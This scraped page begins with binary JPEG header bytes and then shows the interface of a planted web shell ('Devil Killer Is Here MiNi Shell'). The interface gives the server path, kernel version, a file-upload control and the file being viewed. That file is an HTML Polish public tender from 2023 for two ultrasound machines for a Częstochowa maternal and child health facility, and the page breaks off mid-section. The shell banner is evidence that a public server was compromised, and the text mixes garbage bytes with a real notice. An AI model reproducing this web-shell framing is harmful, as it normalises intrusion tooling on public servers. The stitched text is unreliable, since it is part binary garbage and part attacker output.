JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230228/0011457501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 2 aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego WZOZ nad Matką, Dzieckiem i Młodzieżą z siedzibą w Częstochowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151536730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana III Sobieskiego 7A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Częstochowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-217</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmach@matkadziecko.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.matkadziecko.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> podmiot leczniczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 2 aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego WZOZ nad Matką, Dzieckiem i Młodzieżą z siedzibą w Częstochowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-03941276-b747-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00114575</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00067099/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup aparatów USG do Poradni Ginekologii i Położnictwa i Poradni Wieku Rozwojowego WZOZ nad Matką, Dzieckiem i Młodzieżą z siedzibą w Częstochowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-03941276-b747-11ed-b8d9-2a18c1f2976f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344), tj.: przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. tj.:za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>2.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: gmach@matkadziecko.com.pl (nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w formularzach ofertowych.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344), tj.: przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. tj.:za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji).<br/>3.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komu. za pomocą poczty elektronicznej na adres e-mail: gmach@matkadziecko.com.pl (nie dotyczy składania ofert) oraz adresy e-mail Wykonawców podane w form.ofertowych.<br/>4.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odp.. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dot. treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>6.	Wszystkie wysłane i odebrane w post. przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>7..	Maks. rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako zał. do jednego formularza).<br/>8.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia okr .Regulamin Platformy e-Zamówienia.<br/>Ze wzgl. na ogr. ilość znaków szczegóły w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest: Dyrektor Pani Małgorzata Lemańska z siedzibą Wojewódzkim Zakładzie Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą<br/>Ul. Sobieskiego 7a, 42-200 Częstochowa.<br/>	Administrator wyznaczył Inspektora Ochrony Danych - Dominik Spałek, z którą może się Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób: e-mail: iod@informatyka-serwis.pl pisemnie na adres siedziby Administratora,<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: <br/>	Dostawa 2 aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego. Zadanie realizowane w ramach Marszałkowskiego Budżetu Obywatelskiego Województwa Śląskiego pn:<br/> &#34;Zakup aparatów USG do Poradni Ginekologii i Położnictwa oraz Poradni Ginekologii Wieku Rozwojowego Wojewódzkiego Zakładu Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą z siedzibą w Częstochowie.&#34;.&#34;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2022 r. poz. 1710 z późn.zm.), dalej „ustawa Pzp”;<br/>	Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/><br/><br/><br/>(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/><br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postepowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDZ.262.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Dostawa 2 aparatów USG do Poradni Ginekologii i Położnictwa ora do Poradni Ginekologii Wieku Rozwojowego o parametrach technicznych nie gorszych niż:<br/><br/>L.p.	Minimalne warunki oraz parametry wymagane przez Zamawiającego<br/>1. Cyfrowy aparat ultrasonograficzny – 2 szt.<br/>1) Cyfrowy aparat ultrasonograficzny fabrycznie nowy, nieużywany, nieeksponowany na wystawach lub imprezach targowych, nieregenerowany kompletny, nieuszkodzony, sprawny technicznie, gotowy do pracy, aktualne produkowany na rynku. <br/>Data produkcji – 2023 rok.<br/>Zasilanie sieciowe 220-240V.<br/><br/>Wykonawca oświadcza, że oferowany sprzęt jest fabryczne nowy, nieużywany, nieeksponowany na wystawach lub imprezach targowych, nieregenerowany kompletny, nieuszkodzony, sprawny technicznie, gotowy do pracy, aktualne produkowany na rynku, o parametrach nie gorszych niż wymagane przez Zamawiającego.<br/>2) Rok produkcji wyszczególniony na oryginalnych tabliczkach znamionowych producenta, umieszczonych na aparacie i wszystkich głowicach. <br/>3) Pełne oprogramowanie aparatu udostępnione na nośniku <br/>typu pendrive/płyta CD. <br/>Możliwość samodzielnego wgrania udostępnionego oprogramowania do aparatu i przywrócenia pracy systemu. <br/>4) Wersja oprogramowania wprowadzona na rynek nie wcześniej niż w 2022 roku <br/>5) Aparat łatwy w transporcie i przewożeniu. Waga maksymalna 60 kg.<br/>6) Aparat posiadający funkcję umożliwiającą zabezpieczenia hasłem dostępu do danych pacjenta przez nieuprawnione osoby. Funkcja umożliwiająca logowanie się użytkowników za pomocą haseł, z możliwością nadawania im uprawnień.<br/>7) Monitor wysokiej rozdzielczości kolorowy, cyfrowy typu LED, o przekątnej ekranu min. 21,5&#34;. <br/>Rozdzielczość monitora min. 1920x1080. <br/>Możliwość szybkiego dostosowania jasności, kontrastu i temperatury barwowej. <br/>8) Konsola aparatu wyposażona w ekran dotykowy o przekątnej minimum 13 cali do sterowania funkcjami aparatu. Ekran dotykowy posiadający możliwość konfiguracji przez użytkownika ilości dostępnych funkcji i ich umiejscowienia na ekranie. <br/>9) Możliwość zaprogramowania min. 4 gestów programowanych przez użytkownika do szybkiej zmiany głowicy lub wywołania innej żądanej funkcji.<br/>10) Fizyczna klawiatura alfanumeryczna zabezpieczona folią ochronną, uniemożliwiającą, w trakcie pracy i dezynfekcji, zalanie płynem lub żelem. <br/>11) Dynamika aparatu min.265 dB. <br/>12) Możliwość ustawienia min. 8 stref ogniskowania na ekranie.<br/>13) Ilość niezależnych jednakowych gniazd dla głowic obrazowych przełączanych elektronicznie - min. 3<br/>14) Oprogramowanie do samodzielnego sprawdzenia kondycji głowic aparatu przez użytkownika <br/>15) Zakres częstotliwości pracy min. 2.0 -18.0 MHz<br/>16) Możliwość regulacji wysokości konsoli góra-dół min. 10 cm. <br/><br/>17) Videoprinter czarno-biały zamontowany z przodu aparatu, umożliwiający otrzymanie wydrukowanego zdjęcia.<br/>18) Wbudowany w aparat, zintegrowany, dwustopniowy podgrzewacz żelu.<br/>2. Obrazowanie i prezentacja obrazu <br/>1) Frame Rate (maksymalna prędkość obrazowania ) dla trybu B, min. 1750 obrazów/s<br/>2) Obrazowanie harmoniczne z odwróceniem impulsu (inwersja)<br/>3) Frame Rate (maksymalna prędkość obrazowania ) dla trybu Dopplera kolorowego, min. 1400 obrazów/s<br/>4) Możliwość zmian map koloru w Dopplerze kolorowym - min. 18 map do wyboru<br/>5) Możliwość wyłączenia bramki kolorowego Dopplera na obrazach z pamięci i przejścia do trybu B<br/>6) Power Doppler – min 10 map do wyboru. Power Doppler z oznaczeniem kierunku przepływu<br/>7) Regulacja wielkości bramki Dopplerowskiej w zakresie nie mniejszym niż 1- 16 mm<br/>8) Regulacja bramki dopplerowskiej - korekcja kąta bramki Dopplerowskiej minimum 85o podczas badania („na żywo”) .<br/>9) Korekcja kąta bramki Dopplerowskiej minimum 85o na obrazie zatrzymanym i obrazach z pamięci w celu analizy i pomiarów dopplerowskich.<br/>10) Możliwość regulacji położenia linii bazowej i korekcji kąta w trybie Dopplera spektralnego na obrazach zapisanych na dysku<br/>11) Doppler pulsacyjny PWD z rejestracją prędkości maksymalnej (przy zerowym kącie bramki) do min. 6.5 m/s. Wybór min. 7 prędkości przesuwu zapisu trybu PW <br/>12) Możliwość obrazowania jednoczasowego w min. trzech trybach - Triplex (B+CD+PWD)<br/>13) Praca aparatu w trybie wielokierunkowego emitowania i składania wiązki ultradźwiękowej typu „Compound”<br/>14) Liczba wiązek tworzących obraz w obrazowaniu typu „Compound” min. 5<br/>15) Adaptacyjne przetwarzanie obrazu redukujące artefakty i szumy pracujące w połączeniu z trybem kolor Doppler, obrazowaniem w trybie obrazowania wielokierunkowego, na obrazach na żywo i z archiwum aparatu<br/>16) Strefowe pionowe wzmocnienie obrazu (LGC)<br/>17) Strefowe wzmocnienie obrazu na wybranych głębokościach (TGC) <br/>- min. 8 stref<br/>18) Zoom dla obrazów „na żywo&#34; i zatrzymanych, na obrazach z archiwum minimum 30 x <br/>19) Liczba obrazów pamięci dynamicznej (tzw. Cineloop) min. 200.000 obrazów. <br/>20) Wybór min. 10 różnych prędkości odtwarzania filmu w pamięci CINE.<br/>21) Pamięć dynamiczna dla trybu B-mode i Dopplera kolorowego min. 900 sekund <br/>22) Wbudowany samouczek - oprogramowanie instruktażowe dotyczące prawidłowego przyłożenia głowic i zawierające bazę obrazów klinicznych<br/>3. Archiwizacja <br/>1) Wbudowany dysk twardy SSD o pojemności min. 500 GB, przeznaczony na archiwizację danych pacjentów, raportów i obrazów. Przestrzeń na zapis danych pacjentów &gt;350 GB<br/>2) Wykonanie funkcji przetwarzania obrazów zatrzymanych i pętli obrazowych oraz obrazów i pętli zarchiwizowanych. Funkcje przetwarzania obrazów zarchiwizowanych w trybie B-mode, min:<br/><br/>- Regulacja wzmocnienie 2D gain<br/>- Regulacja wzmocnienia strefowego suwaków TGC<br/>- automatyczna optymalizacja włącz<br/>-automatyczna optymalizacja wyłącz<br/>- powiększenie obrazu x 30<br/>- mapy szarości<br/>- koloryzacja<br/><br/>3) Wykonanie funkcji przetwarzania obrazów zatrzymanych i pętli obrazowych oraz obrazów i pętli zarchiwizowanych. Funkcje przetwarzania obrazów zarchiwizowanych w trybie Color Doppler, min:<br/><br/>- przesunięcie linii bazowej<br/>- zmiana mapy koloru<br/>- obrócenie invert<br/>4) Wykonanie funkcji przetwarzania obrazów zatrzymanych i pętli obrazowych oraz obrazów i pętli zarchiwizowanych. Funkcje przetwarzania obrazów zarchiwizowanych w trybie Dopplera pulsacyjnego, min: <br/><br/>- wzmocnienie<br/>- przesunięcie linii bazowej<br/>- korekcja kata<br/>- automatyczna korekcja kąta<br/>- inwersja spektrum<br/>5) Zapis obrazów na pamięci USB PenDrive w formatach co najmniej AVI, JPEG, WMV, DICOM, RAW DICOM. <br/>6) Minimum 4 gniazda USB wbudowane w aparat<br/>7) Baza danych pacjentów z możliwością zapisu raportów, obrazów statycznych, pętli obrazowych<br/>8) Możliwość jednoczesnego zapisu obrazu na wewnętrznym dysku SSD, zapisu na pamięci flash oraz wydruku obrazu na videoprinterze po naciśnięciu jednego przycisku.<br/>9) Możliwość eksportu obrazów, sekwencji i raportów bezpośrednio na komputer klasy PC<br/>10) Opcja automatycznej optymalizacji obrazu po naciśnięciu jednego przycisku w trybie B (jasność, kontrast), PW (PRF, położenie linii bazowej, inwersja)<br/>11) Oprogramowanie pomiarowe wraz z pakietem obliczeniowym do badań co najmniej:<br/>1.	Ginekologicznych<br/>2.	Położniczych <br/>3.	jamy brzusznej <br/>4.	naczyniowych<br/>5.	płucnych<br/>6.	małych narządów,<br/>7.	mięśniowo – szkieletowych<br/>8.	ginekologiczno-położniczych<br/>9.	kardiologicznych<br/>10.	pediatrycznych<br/>11.	transkranialnych<br/>12) Pakiet obliczeń automatycznych dla trybu Dopplera (automatyczny obrys spektrum) na obrazie zamrożonym i „na żywo”. Dostępne pomiary min. PS, ED, MD, PI, RI, AT, PS/ED, ED/PS, HR, TAMAX, Volume Flow. <br/>13) Pakiet biometrycznych obliczeń automatycznych dla trybu 2D – min BPD, HC, AC, HL, FL<br/>14) Raporty dla każdego rodzaju i trybu badania z możliwością dołączenia obrazów do raportów<br/>15) Możliwość podłączenia monitora zewnętrznego poprzez gniazda co najmniej HDMI, VGA, S-Video<br/>16) Tryb czuwania „standby” umożliwiający ponowne uruchomienie aparatu w czasie do 20 sekund<br/>(...) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33112200-0 - Aparaty ultrasonograficzne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">51411000-6 - Usługi instalowania sprzętu obrazującego</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z wymogami SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa 